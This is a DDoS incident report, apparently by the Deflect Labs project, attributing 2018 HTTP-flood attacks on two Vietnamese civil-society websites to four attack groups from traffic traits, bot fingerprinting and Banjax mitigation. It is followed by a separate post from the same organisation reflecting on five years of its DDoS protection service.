For a long-time, we have been using visualization and machine learning tools to analyze DDoS attacks (for instance in the report on attacks against Black Lives Matter). We find it is more reliable to consider information about the whole session of an IP (all the requests done by an IP over a period of time) rather than per request. So we generate features describing each IP session and then visualize and cluster these IPs to identify bots. This approach is really interesting to confirm the link between these different attacks, here were are relying on the four following features to compare the sessions from the different groups:
Number of different user-agents used
Number of different query strings done
Number of different paths queried
Size of the requests
First, we can clearly see that the Incident 8 has an identifiable signature due to the utilization of a specifically crafted tool generating random user agent and random query strings (1058 query strings and 329 user-agents) :
Considering other attacks now, the identification is not that clear, mainly because some IPs seems to do both legitimate visits of the website and attacks at the same time. But for most of the IPs, we clearly see that the number of query string and the payload size is discriminant :
Summary of the Different Attack Groups
Overall, we identified four different groups of attacks sharing the Same TTPs :
Date
Target
Attack Group
1
2018/04/17
viettan.org
Group A
2
2018/04/17
baotiengdan.com
Group A
3
2018/05/04
viettan.org
Group B
4
2018/05/09
viettan.org
Group A
5
2018/05/09
baotiengdan.com
Group A
6
2018/05/23
baotiengdan.com
Group A
7
2018/06/07
baotiengdan.com
Group A
8
2018/06/10
baotiengdan.com
Group C
9
2018/06/12
viettan.org
Group D
10
2018/06/15
baotiengdan.com
Group C
Let’s enter into the detail of TTP for each group :
Group A : TTPs for this group seem to be quite generic and we have only a moderate confidence that the attacks are linked. All these attacks are querying/ (which is pretty common) with on user agent per IP (regularly an empty user agent). The IPs from these groups are coming from Asia, mostly India, Indonesia, Philippines or Malaysia. Attacks in this group are often reusing the same user-agents which could indicate several versions of the same payload.
Group B : this attack used the user-agent Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2) to query either GET / or POST /spip.php?page=email&id_article=10283
Group C : two attacks with the user-agent python-requests/2.9.1 (showing the utilization of a python script with the requests library) querying either /?&s=nguyenphutrong or a random search term like/?s=06I44M
Group D : One attack with a tool using a random value among a list of 329 user-agents, and random query strings (like?x=%99%94%7E%85%7B%7E%8D%96) to bypass caching
Analyzing Attack Groups
Group A
Group A attacks were definitely the most frequent case we saw since April, with six different attacks done on both Việt Tân and Tiếng Dân’s websites.
Two simultaneous incidents
On the 9th of May for instance, we saw a peak of banned IPs first on attacks against viettan.org, then baotiengdan.com :
We can confirm that there was also a peak of traffic to both websites :
Looking at the traffic more closely, we see that the majority of IPs generating most of the traffic are only making requests to the / path, like this IP 61.90.38.XXX which did 4253 GET requests to/ with user agent Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1 (this user agent means that the request came from a Firefox 13 browser on Windows 7, Firefox 13 was released in April 2012, it is pretty unlikely to see people using it today) over 30 minutes :
We identified as bots all the IPs displaying an unusual number of queries to “/” (more than 90% of their traffic), and ended up with a list of 217 IPs targeting viettan.org and 725 IPs targeting baotiengdan.com, with 14 in common between both incidents.
Checking where these IPs are located, we can see that they are mainly in India and Indonesia :
Top 10 countries :
243 India
138 Indonesia
61 Philippines
34 Morocco
34 Pakistan
29 Thailand
27 Brazil
22 Vietnam
19 Algeria
19 Egypt
Analyzing the source of these incidents
We then wanted to understand what is the source of these incidents and we have four major hypothesis :
We aggregated the 2212 IP addresses of these 6 incidents and identified their Autonomous System. To distinguish between servers and internet connections, we used ipinfo.io classification of Autonomous Systems :
1988 ISP
163 business
38 hosting
23 Unknown
This set of IPs is then mostly coming from personal Internet access networks around the world, either from compromised routers or compromised end-devices. For a long time, most botnets were comprised of compromised Windows systems infected through worms, phishing or backdoored applications. Since 2016 and the appearance of the Mirai botnet it is clear that Internet-Of-Things botnets are becoming more and more common and we are are seeing compromised routers or compromised digital cameras being used for DDoS attacks regularly.
The main difference between these two cases, is that IoT systems are reachable from the Internet and often compromised through open ports. To differentiate these two cases, we used data from the Shodan database. Shodan is a platform doing regular scans of all IPv4 addresses, looking for specific ports (most of them specific to IoT devices) and storing the results in a database that you can query through their search engine or through their API. We have implemented a script querying the Shodan API and using signatures over the results to fingerprint systems running on the IP address. For instance MikroTik routers often expose either a telnet, SNMP or web server showing the brand of the router. Our script downloads data from Shodan for an IP, and checks if there are matches on different signatures from MikroTik routers. Shodan allows to get historical data for these scans, so we included data for the past 6 months for each IP in order to maximize information to fingerprint the system.
There are definitely limitations to this approach as a MikroTik router could be secure but routing traffic from a compromised end-system. But our hypothesis is that we would identify similar routers or IoT systems for a large part of IP address in the case of an IoT botnet.
By running this script over 2212 IP addresses for the group A, we identified 381 routers, 77 Digital Video Recorders and 50 routers over 2212 IPs. 1666 of them did not have any open port according to Shodan, which tends to show that they were not servers but rather professional or personal Internet access points. So in the end, our main hypothesis is that these IPs are mostly compromised end-systems (most likely Windows systems).
Regarding location, we used MaxMind Free GeoIP database to identify the source country, and found that 50% of the IPs are located in India, Indonesia, Brazil, Philippines, and Pakistan.
Group B
The second group was responsible for one DDoS attack against Viettan.org from the 29th of April to the 4th of May using 5000 different IP addresses :
The attack tool has specific characteristics :
All bots were using the same User-Agent : Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)
Bots were querying only two different paths
GET /
POST /spip.php?page=email&id_article=10283 It seems to query a page on the web framework SPIP which could exploiting a known SPIP vulnerability but it is curious as viettan.org is not running SPIP
If we look at the Autonomous System of each IP, we see that 97.7% of them are coming from the AS 4134 which belongs to the state-owned company China Telecom for Internet access in China :
We fingerprinted the systems using the Shodan-based tool described in 2.1, and identified 901 systems as routers (884 of them being Mikrotik routers), and 512 systems as servers (mostly Windows servers and Ubuntu servers)
It is interesting to see Mikrotik routers here as manypeople observed botnets compromising MikroTik routers back in March this year exploiting some known vulnerabilities. But still, having 884 MikroTik routers only represent 17.6% of the total number of IPs involved in this attack. Our main hypothesis is that this botnet is mostly comprised of compromised end-systems (Windows or Android likely). It is also possible that we have here a botnet using a mix of compromised end-systems and compromised MikroTik routers.
The most surprising specificity of this botnet is that it is coming almost only from one Autonomous System, AS4134, which is not common in DDoS attacks (most of the times targets are distributed over different countries). A third hypothesis is that this traffic could come from traffic injection by the Internet Service Provider in order to cause clients to do requests to this website. Such attack was already identified once by Citizen Lab in 2015 in their China’s Great Cannon report against github.com and GreatFire.org. We consider this third hypothesis unlikely as this 2015 attack is the only documented case of such an attack, and it would require a collaboration between Vietnamese groups likely at the origin of these attacks and this Chinee state-owned Internet provider, for a costly attack with little to no impact on the targeted website.
Group C
The third group consists of two attacks targeting baotiengdan.com on the 10th and the 15th of June, using a specially crafted tool. We identified it first on the 10th of June 2018 when a peak of traffic created issues on the website. We quickly identified that there was an important number of requests done from different IPs all with the same user agent python-requests/2.9.1
Over 5 million requests were done that day by 349 IP addresses. In order to bypass the caching done by Deflect, the bots were configured to query the search page, half of them with the same query /?&s=nguyenphutrong, which is a research for the name of Nguyen Phú Trọng , the actual General Secretary of the Communist Party of Vietnam. The other half of bots were doing random search queries like ?s=046GYH or ?s=04B9BV.
These 349 IPs were distributed in different countries (top 10 only mentioned here):
56 United States
43 Germany
35 Netherlands
30 France
17 Romania
16 Canada
12 Switzerland
11 China
10 Russia
9 Bangladesh
Looking more closely at the hosts, we identified that 180 of them are actually Tor Exit Nodes (the list of tor exit nodes is public). We used the same fingerprint technique based on Shodan to identify the other hosts and found that 89 of them are routers (mostly MikroTik routers) and 51 servers :
This mix of routers and servers is confirmed by ipinfo.io AS Classification on these non-Tor IPs:
68 ISP
52 Hosting
42 Business
7 Unknown
So this attack used two different types of relays at the same time: the Tor network and compromised systems, routers or servers.
The second attack by this group was surprisingly different, we identified a peak of traffic on the 15th of June on baotiengdan.com again, coming from a single IP 66.70.255.195 which did 560 030 requests over a day:
This traffic was definitely coming from the same attack group as it was using the same user agent (python-requests/2.9.1) and requesting the same page /?s=nguyenphutrong.
The IP 66.70.255.195 is an open HTTP proxy located in the OVH network in Montreal, and listed in different proxy databases (like proxydb or proxyservers). It is surprising to see an HTTP proxy used here considering the heavy attack done 5 days before by the same group. Using an open HTTP proxy definitely brings anonymity to the attack but it also limits the bandwidth for the attack to the proxy bandwidth (in that case 5000 requests per minutes at its maximum). Our hypothesis is that a group of people with different skills and resources are sharing the same tool to target baotiengdan.com. It is also possible that one person or one group is trying different attacks to see what is the most effective.
Group D
The fourth group only consists of one attack coming from an IP address in Vietnam on the 12th of June 2018, when we saw a peak of requests from the IP 113.189.169.XXX on the website viettan.org :
This attack had the following characteristics :
Query / with a random query (like ?%7F) in order to avoid Deflect caching
Using a random user agent from a list of 329 user agents values.
These are pretty clear characteristics that we have not seen in other attacks before. This IP address belongs to the AS 45899 managed by the state-owned Vietnam Posts and Telecommunications Group company. It seems to be a standard domestic or business Internet access in Haiphong, Vietnam. Considering the low level of the attack, it is completely possible that it came from an individual from their personal or professional Internet access.
Links with other attacks
On the 10th of July, Qurium published a report about DDoS attacks against two vietnamese websites : luatkhoa.org and thevietnamese.org on the 11th of June 2018. Luật Khoa tạp chí is an online media covering legal topics and human rights in Vietnamese. The Vietnamese is an independent online magazine in Vietnam aiming at raising public awareness on the human rights situation and politics in Vietnam among the international community.
Qurium was able to confirm with us lists of IPs responsible for most traffic during this DDoS attack and we found that 4 of these IPs were also used in the incidents 1, 5, 6 and 7, all parts of the Group A.
Comparing the list of User-agents listed in the article with the list of user-agents used by incidents from Group A, we see that between 22 and 42 percents are similar :
Compared with incident
Number of UA
Number of similar UA
Percentage
1
54 & 42
16
38.10 %
2
42 & 40
9
22.50 %
4
57 & 42
15
35.71 %
5
97 & 42
18
42.86 %
6
68 & 42
14
33.33 %
7
42 & 38
11
28.95 %
As described before, it is hard to attribute these attacks to the same group, but they definitely share some similar TTPs. Seeing DDoS attacks with similar TTPs used during the same period of time to target 4 different political groups or independent media’s websites definitely confirms the coordinated nature of these attacks, and their particular interest in attacking Vietnamese media and civil society groups.
Mitigation
Our mitigation system uses the Banjax tool, an Apache Traffic Server plugin we wrote to identify and ban bots based on traffic patterns. For instance, we ban IP addresses making too many queries to /. This approach is efficient in most cases, but not when the DDoS is coming from multiple hosts staying under the Banjax’s thresholds. In these different incidents, half of them were mitigated automatically by our Banjax rules. For the other incidents, we had to manually add new rules to Banjax or enable the Banjax javascript challenge which requires browsers to compute mathematical operations before being allowed to access the website (hence blocking all automated tools that are not implementing javascript).
Overall, these attacks created limited downtime on the targeted websites, and when it happened, we worked in collaboration with Viettan and Tieng Dan to mitigate them as soon as possible.
Conclusion
In this report, we presented attacks that targeted Việt Tân and Tiếng Dân’s websites since mid-April this year. It shows that Distributed Denial of Service attacks are still a threat to civil society in Vietnam and that DDoS is still used to silence political groups and independent media online
On a technical level, HTTP flood is still commonly used for DDoS and is still quite effective for websites without filtering solutions. Investigating the origin of these attack is an ongoing mission for us and we are constantly looking for new ways to understand and classify them better.
One objective of publishing these reporting is to foster collaborations around analyzing DDoS attacks against civil society. If you have seen similar attacks or if you are working to protect civil society organizations against them, please get in touch with us at outreach AT equalit.ie
Acknowledgements
We would like to thank Việt Tân and Tiếng Dân for their help and collaboration during this investigation. Thanks to ipinfo.io for their support.
Appendix
Indicators Of Compromise
It is common to publicly share Indicators of Compromise (IOCs) in attack reports. Sharing IOCs related to DDoS attacks is more challenging as these attacks are often done through relays (whether proxies or compromised systems), so sharing lists of IP addresses can have side-effects over victims we cannot control. We have thus decided not to share IOCs publicly but we are open to share them privately with organizations or individuals who could be targeted by the same groups. Please contact us at outreach AT equalit.ie.
Fingerprinting systems based on Shodan data
As described earlier in this report, we have developed a script to fingerprint systems based on Shodan data. This script is published on github and released under MIT license. Feel free to open issues or submit Pull Requests.
This is the fifth year of Deflect operations and an opportune time to draw some conclusions from the past and provide a round of feedback to our many users and peers. We fought and won several hundred battles with various distributed denial of service and social engineering attacks against us and our clients, expanding the Deflect offerings of open source mitigation solutions to also include website hosting and attack analytics. However, several important missteps were taken to arrive here and this post will concentrate on lessons learned and the way forward in our battle to reduce to prevalence of DDOS as an all too common technique to silence online voices.
Our reflections and this post were motivated by an external evaluation report of the Distributed Deflect service, which you can read in this PDF. The project itself was a technical long shot and an ambitious community building exercise. Lessons learned from this endeavor are summarized within. Its about a 10 minute read 🙂
During peak times on Deflect throughout 2012-2016 we were serving an average of 3 million unique daily readers and battling with simultaneous DDoS attacks against several clients. The network served websites continuously for the entire 3 1/4 years of project duration, recording less than 30 minutes of down time in total. The project had direct impact on over four hundred independent media, human rights and democracy building organizations.
Over three hundred and fifty websites passed through the Deflect protection service. These websites ranged in size and popularity, receiving anything between a dozen daily readers to over a million. Our open door policy meant that websites who had changed their mind about Deflect protection were free to leave and unhindered in any way from doing so. Over the course of the project, we have mitigated over four hundred DDoS attacks and served approximately 1% of Internet users each calendar year (according to our records correlated against Internet World Statistics). Our work also appeared in topical and mainstream media.
Aside from the DDoS protection service, we trained numerous website administrators in web security principles, worked with several small and medium ISPs to set up their own Deflect infrastructure and enabled Internet presence for key organizations and movements involved in national and international events, including the ’13 election in Iran, ’14 elections in Ukraine, Iguala mass kidnapping, Panama papers, and Black Lives Matter among others.
Distributed Deflect
As attacks grew in size, we debated the long-term existence of the project, deciding to prototype an in-kind DDoS mitigation service, whereby websites receiving free protection and any volunteers could join and expand the mitigation network’s size and scope. We wanted to create a service run by the people it protected. The hypothesis envisioned the world’s first participatory botnet infrastructure, whereby the network would be sustained with around a hundred servers run by the Deflect project and several thousand volunteer nodes. Our past experience showed that the best way to mitigate a botnet attack was with a distributed solution, utilizing the design of the Internet to nullify an attack that any single end point/s could not handle by itself. Distributed Deflect brought together people of various background and competencies, blending software development and technical service provision, customer support and outreach, documentation and communications. We designed, prototyped and brought into production core components of a distributed volunteer infrastructure, only to realize that the hypothesis behind our proposal could not scale if we were to maintain the privacy and security of all participants in our network.
An infrastructure that would accept voluntary (untrusted) network resources had to introduce checks for content accuracy and confidentiality, otherwise a malicious node could not only see who was doing what on the Deflect network but delete or change content as it passed through their machine. Our solution was to encrypt web pages as they left the origin server and deliver them to readers as an encrypted bundle, with an additional authentication snippet being sent by another node for verification. Volunteer nodes would only be caching encrypted information and would not be able to replace it with alternative content.
All necessary infrastructure design and software tools to implement this model were built to specification. However, once ready for production and undergoing testing, we realized the error in hypothesis made at the onset. Encrypted bundles grew in size, as all page fonts and various third-party libraries – that make up the majority of web pages today and are usually stored in the browser’s cache – had to be included in each bundle.
This increased network latency and could not scale during a DDoS attack. We were worsening the performance of our infrastructure instead of improving it. Another important factor driving our deliberation was the low cost of server infrastructure. By renting our machines with commercial providers, and using their competitive pricing to our advantage, we have managed to maintain infrastructure costs below 5% of our overall monthly expenditure. Monetary support for a worldwide infrastructure of Deflect servers was not significant when compared with the resources required to service the network. By concentrating development efforts on encrypting and delivering website content from our distributed cache and performance load balancing on a voluntary node infrastructure, we held back work on improving network management and task automation. This meant that the level of entry to providing technical support for the network was set quite high and excluded the participation of technically minded volunteers protected by Deflect.
After several months of further testing, deliberation and consultation with our funders, we decided to abandon the initiative to include voluntary network resources, in favour of continuing the existing mitigation platform and improving its services for clients. As attack mitigation became routine and Deflect successfully defended its clients from relentless DDoS offensives, the team began to look at the impunity currently enjoyed by those launching the attacks. Beginning with a case of a Vietnamese independent media website targeted by bots originating from a state-regulated and controlled Vietnamese ISP, we understood that a story could be extracted from the forensic trail of an attack, that may contain evidence of motivation, method and provenance. If this story could be told, it would give huge advocacy power to the target and begin to peel away at the anonymity enjoyed by its organizers. The cost for attacking Deflectees would raise as exposure and media attention around the event upended the attackers’ goals.
We began to develop an infrastructure that would capture a statistically relevant segment of an attack. Data analysis was achieved through machine-led technology for profiling and classifying malicious actors on our network, visualization tools for human-led investigation and cooperation with peer organizations for tracing activity in our respective networks. This effort became Deflect Labs and in its first twelve months we published three detailed reports covering a series of incidents targeting websites protected by Deflect, exposing their methodology and profiling their networks. Doing some open source intelligence and in collaboration with website staff, we identified a story in each attack exposing possible motivations and identity of the attackers. Following publication and media attention created by these reports, attacks against one of the websites reduced significantly and ceased altogether for the other one.
Challenges
Many difficulties and problems could be expected with running a high-impact, 24/7 security service for several million daily readers. Fatigue, lack of time for developing new features, round-the-clock emergency coverage and numerous instances of high-stress situations led to burnout and staff turnover. The resources invested in the Distributed Deflect model set back development considerably for other project ambitions. At around the same time as Deflect was gaining popularity, free mitigation offerings from Cloudflare and Google were introduced in tandem with outreach campaigns targeting independent media and human rights organizations. This led to more options for civil society organizations seeking website protection but made it harder for us to attract the expected number of websites. We started a campaign to define differences in our distinctive approaches to client eligibility, respect for their privacy and clear terms of service, trying a variety of communications and outreach strategies. We were disappointed nonetheless to not have received more support from within our community of peers, as open source solutions and data ownership did not figure highly as criteria for NGOs and media when selecting mitigation options.
… we carry on
Deflect continues to operate and innovate, gradually growing and solidifying. Our ongoing ambitions include offering our clients broader hosting options and coming up with standards and systems for responsible data sharing among like-minded ISPs and mitigation providers. Look out for pleasant graphic user interfaces in our control panels and documentation platforms. We are also prototyping several different approaches to generating revenue in order to sustain the project for the foreseeable future. The goal is to get better without losing track of what we came here to do in the first place. As always, we are here to support our clients’ mission and their right to free expression. We are heartened by their feedback and testimonials.